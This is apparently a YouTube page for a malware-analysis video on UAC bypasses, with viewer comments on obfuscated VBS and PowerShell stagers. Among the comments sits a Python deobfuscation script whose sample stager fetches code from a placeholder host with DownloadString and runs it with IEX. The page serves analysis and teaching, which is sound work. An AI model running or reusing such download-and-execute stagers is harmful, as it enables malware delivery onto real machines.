Malware Analysis & Threat Intel: UAC Bypasses 

John Hammond
1.8M subscribers
117K views

jh.live/anyrun-ti || ANYRUN has just released their latest Threat Intelligence feature set, and it is super cool to track and hunt for malware families or observed tradecraft -- try it out! jh.live/anyrun-ti
Learn Cybersecurity - Name Your Price Training with John Hammond: nameyourpricet...
📧JOIN MY NEWSLETTER ➡ jh.live/email
🙏SUPPORT THE CHANNEL ➡ jh.live/patreon
🤝 SPONSOR THE CHANNEL ➡ jh.live/sponsor
🌎FOLLOW ME EVERYWHERE ➡ jh.live/twitter ↔ jh.live/linkedin ↔ jh.live/discord ↔ jh.live/instagram ↔ jh.live/tiktok
💥 SEND ME MALWARE ➡ jh.live/malware
🔥RU-vid ALGORITHM ➡ Like, Comment, & Subscribe!

Published: 29 Aug 2024
Comments: 69
@IAmmlskOG · 5 months ago
dude you move through this file like butter
@nickadams2361 · 5 months ago
he did it before, this is a planned demo. Normal stuff you should be able to do at work
@user-sx4zy5hn2f · 4 months ago
@nickadams2361 😊😊😊😊😊😊😊😊😊
@IOwnThisHandle · 3 months ago
It is rehearsed
@hedgehogform · 5 months ago
VSCode has a powershell formatter
@HachikoTanuki · 5 months ago
I feel like such a casual that I know none of the tools John is using, while VSCode is too casual for John to know it has a Powershell formatter 😭
@markcentral · 5 months ago
Thanks for the video. Is the anyrun segment part of a sponsored deal? If not, I would have preferred you continued to demonstrate how to deconstruct the malware locally. There's a lot of educational value and wisdom potential being lost by moving things to an online platform that requires a subscription vs local
@gabriell4815162342 · 5 months ago
I love your videos; as a foreigner, and because I don't speak native English, I feel very comfortable and can understand everything because of the calm and concise way you speak. In addition to practicing my English, I learn a lot about cyber security
@Alfred-Neuman · 5 months ago
I learned English by watching lots of RU-vid videos like this. If you are curious enough and/or determined, you'll be able to write some English poetry pretty soon. ;D
@severinghams · 4 months ago
@Alfred-Neuman I don't understand foreigners' fascination with English poetry. Why is poetry something that so many non-English speakers flock to when they learn English? Why not debate, or music, or popular speeches, or literature- why _specifically_ poetry? What is so special about poetry?
@Alfred-Neuman · 4 months ago
@severinghams How many languages do you speak outside of English?
@MadeAnAccountOnlyToReplyToThis · 12 days ago
@severinghams Poetry is built around idiosyncrasies of the language it is written and spoken in. It is arguably the most advanced way of utilizing a language. You can generally translate a speech without issue and get the point across, but you can't translate a poem without losing the essence of the message. You should probably read more poetry.
@Carambolero · 5 months ago
Nice start, but next time if you want to promote a tool, just go to the point and state it in the title. Tx.
@antifreeze44 · 5 months ago
Your take on the Apex stuff was AWESOME, thanks John!
@valk9789 · 5 months ago
Treat at the end~ love John's laugh 😅❤
@PMM619 · 5 months ago
hey, fan from Morocco, all the love !!
@memeconnect4489 · 5 months ago
a lot of danish words in that code
@7YBzzz4nbyte · 5 months ago
Seems to be fluff to obfuscate the code itself. Seems like Danish-inspired gobbledegook, words stacked without meaning, though a scanner would not know (at least not before AI). 😮
@Adkali · 5 months ago
Love the threat analysis using the dynamic analysis. Again, thanks John for another fun schooling video
@cypher2226 · 5 months ago
I didn't know about that UAC bypass
@YuKonSama · 4 months ago
I kind of like the Sublime approach to clean the sample up, but I would also be interested in automating stuff like this (guess R.E.M has tools for this). For example, deleting variables that are assigned but never used should be a pretty easy task.
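The cleanup the comment above asks about (stripping variables that are assigned but never read, which is also the "fluff" and "dead-end code" other commenters describe) can be automated. The Python script below is an added example written for this page; it is not a tool from the video, from REMnux, or from John Hammond. It runs on a constructed PowerShell-style stager whose variable names, strings and the example.invalid URL are made up for the illustration. It removes dead assignments iteratively (removing one assignment can orphan the variables it read), then inlines variables that hold a single string literal and folds string concatenations, so the final download-and-execute line reads plainly.

```python
import re

# Constructed sample (not from the video): a PowerShell-style stager padded with
# assignments that are never read. Names, strings and the URL are made up.
SAMPLE = r"""
$Forhandlinger = 'Nogle';$Forhandlinger = 'spildte';$Forhandlinger = 'ord'
$Smagsproever = 'http://'
$Kaffe = 'ikke brugt'
$Smagsproever2 = 'example.invalid/stage.txt'
$Hund = 'heller ikke brugt'
$Lampe = $Smagsproever + $Smagsproever2
$Uddannelse = 'dead end'
$Skrivebord = 'DownloadString'
$Vindue = (New-Object Net.WebClient).$Skrivebord($Lampe)
$Helikopter = $Kaffe
IEX $Vindue
"""

VAR_RE = re.compile(r"\$([A-Za-z_]\w*)")                            # $name reference
ASSIGN_RE = re.compile(r"^\s*\$([A-Za-z_]\w*)\s*=(?!=)\s*(.+?)\s*$")  # $name = rhs
STR = r"'((?:[^']|'')*)'"                                           # single-quoted literal
CONCAT_RE = re.compile(STR + r"\s*\+\s*" + STR)                     # 'a' + 'b'
MEMBER_RE = re.compile(r"\.'([A-Za-z_]\w*)'")                       # .'Method'( -> .Method(


def split_statements(script):
    """Split on newlines and on ';' outside quoted strings (no here-string support)."""
    stmts, cur, quote = [], [], None
    for ch in script:
        if quote:
            cur.append(ch)
            if ch == quote:
                quote = None
        elif ch in "'\"":
            quote = ch
            cur.append(ch)
        elif ch in ";\n":
            if "".join(cur).strip():
                stmts.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
    if "".join(cur).strip():
        stmts.append("".join(cur).strip())
    return stmts


def reads_in(stmt):
    """Variables a statement reads: the right-hand side of an assignment, else all of it."""
    m = ASSIGN_RE.match(stmt)
    return set(VAR_RE.findall(m.group(2) if m else stmt))


def strip_dead_assignments(stmts):
    """Drop assignments whose target is never read. Iterate to a fixed point, because
    removing one assignment can orphan the variables its right-hand side read."""
    stmts = list(stmts)
    while True:
        live = set().union(*(reads_in(s) for s in stmts))
        kept = [s for s in stmts
                if not (ASSIGN_RE.match(s) and ASSIGN_RE.match(s).group(1) not in live)]
        if len(kept) == len(stmts):
            return kept
        stmts = kept


def fold_strings(stmt):
    """Collapse 'a' + 'b' into 'ab' and turn .'Method'( into .Method( for readability."""
    while True:
        new = CONCAT_RE.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", stmt)
        if new == stmt:
            return MEMBER_RE.sub(r".\1", stmt)
        stmt = new


def inline_string_constants(stmts):
    """Substitute variables assigned exactly once with a bare string literal at every
    place they are read, and drop the now-redundant assignment."""
    counts, consts = {}, {}
    for s in stmts:
        m = ASSIGN_RE.match(s)
        if m:
            counts[m.group(1)] = counts.get(m.group(1), 0) + 1
            if re.fullmatch(STR, m.group(2)):
                consts[m.group(1)] = m.group(2)
    consts = {k: v for k, v in consts.items() if counts[k] == 1}
    out = []
    for s in stmts:
        m = ASSIGN_RE.match(s)
        if m and m.group(1) in consts:
            continue
        s = VAR_RE.sub(lambda v: consts.get(v.group(1), v.group(0)), s)
        out.append(fold_strings(s))
    return out


def deobfuscate(script):
    """Alternate dead-code removal and constant inlining until nothing changes."""
    stmts = split_statements(script)
    while True:
        new = inline_string_constants(strip_dead_assignments(stmts))
        if new == stmts:
            return new
        stmts = new


if __name__ == "__main__":
    print("\n".join(deobfuscate(SAMPLE)))
```

Run it as a script to print the cleaned statements; on the constructed sample the eleven lines of padding reduce to a single DownloadString call followed by IEX. The splitter respects quotes but is deliberately simple (no here-strings, no `${name}` syntax, no subexpressions, no double-quoted interpolation), so treat the output as a reading aid and confirm the sample's real behaviour by detonating it in a sandbox, as the video does.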
@dipongkorroy6424 · 5 months ago
Love from Bangladesh ❤
@user-lq3tv4nd8w · 5 months ago
Why did you bang ladesh tho, poor fella
@Duy1P3 · 5 months ago
I'd really like to see your homelab setup and see how you run things and do your investigations, and with what tools and stuff.
@Supstone8519 · 5 months ago
Very insightful. Thank you for doing this video.
@k.g.c.karunathilaka9781 · 4 months ago
Thanks
@Streetrack · 5 months ago
I really like this one!!
@learnsomething564 · 5 months ago
First one ooooo now i have millions in my account
@eikichi9050 · 5 months ago
Hello Mr Hammond, is it possible to defend against these types of attacks? Sorry for my English
@UnfiItered · 5 months ago
If your end users don't use/run vbs/batch/PS1 scripts, you can make a group policy to require UAC to run them or disable them completely.
@ShayBlez · 5 months ago
Never thought I'd see Bonzi Buddy again.. XD
@allofabout7064 · 5 months ago
I hope you discuss Qlin Ransomware, and how to overcome it (recovery)
@codytrout3257 · 5 months ago
Pro tip: change the speed to slower if you can't keep up with the commands fully yet, like me.
@johnvardy9559 · 4 months ago
I love you john
@user-yi4ef2gk1o · 5 months ago
NICE this is really menace :)
@capability-snob · 5 months ago
What was the intended use of this .ini file and the class named by the guid?
@JohnSmith-jc7dk · 5 months ago
why is vbs required to deploy remcos and not deploying remcos directly?
@UnfiItered · 5 months ago
Vbs was just a stager to build the powershell to run. Basically the hacker was trying to hide what they were doing behind a bunch of dead-end code.
@chri-k · 5 months ago
The point is that anyone who finds the malware but doesn't know how to handle this (including antiviruses) will likely not try to, which hopefully buys some more time before it gets logged into a malware registry. Inflated file sizes also stop VirusTotal and some antiviruses from analysing the file
@carsonjamesiv2512 · 5 months ago
NICE!😃
@psbharathkumarachari4005 · 5 months ago
hi man, fan from india
@carteldebellamy677 · 5 months ago
Awesome video
@RandomytchannelGD · 5 months ago
Hi
@mdfourhadkhan1842 · 5 months ago
❤❤❤❤❤❤
@Hacker_Solo · 5 months ago
Where can we obtain this sample for free?
@XtremuZ · 15 days ago
malware bazaar
@frinkifail7063 · 5 months ago
sure love assimilationist one hundred thirty nine
@runandwin5396 · 5 months ago
Chapters please?
@SlipperyCarrot · 5 months ago
Whole lot of Danish words in that sample..
@liljeep3631 · 5 months ago
You guys use uac?
@UnfiItered · 5 months ago
? Everyone in the AD world uses UAC. You don't want your end users in a lower-privilege group policy to just download and run anything without UAC. You're opening yourself up to so many threat vectors by doing that.
@liljeep3631 · 5 months ago
@UnfiItered vector these nuts
@UnfiItered · 5 months ago
@liljeep3631 okay, obviously you're a troll.
@liljeep3631 · 5 months ago
@UnfiItered don't need uac
@UnfiItered · 4 months ago
@nezu_cc other than stealing files via emails and accessing the network, everything else should require UAC via group policy (cmd, pwsh, windows native file encryption tools, vbs, portable exe etc..). Even then, group policy should dictate which users have access to which network drive. Outlook is the only email client used. Attachments are disallowed unless sending to internal email.
@bamboozledbamboozler · 2 months ago
I... i got so fucking lost. To be fair idk shit but i still find coding nonsense interesting
@user-cz1lz5ye4i · 4 months ago
voice
@user-cz1lz5ye4i · 4 months ago
mom
@user-cz1lz5ye4i · 4 months ago
@#
@iamwitchergeraltofrivia9670 · 5 months ago
Fucking intel
@user-cz1lz5ye4i · 4 months ago
mobile no.
@Monothefox · 5 months ago
It's in Danish.
@user-cz1lz5ye4i · 4 months ago
bhabhi
@radityaharya · 5 months ago
your audio sounds weird
@nordgaren2358 · 5 months ago
What's weird about it?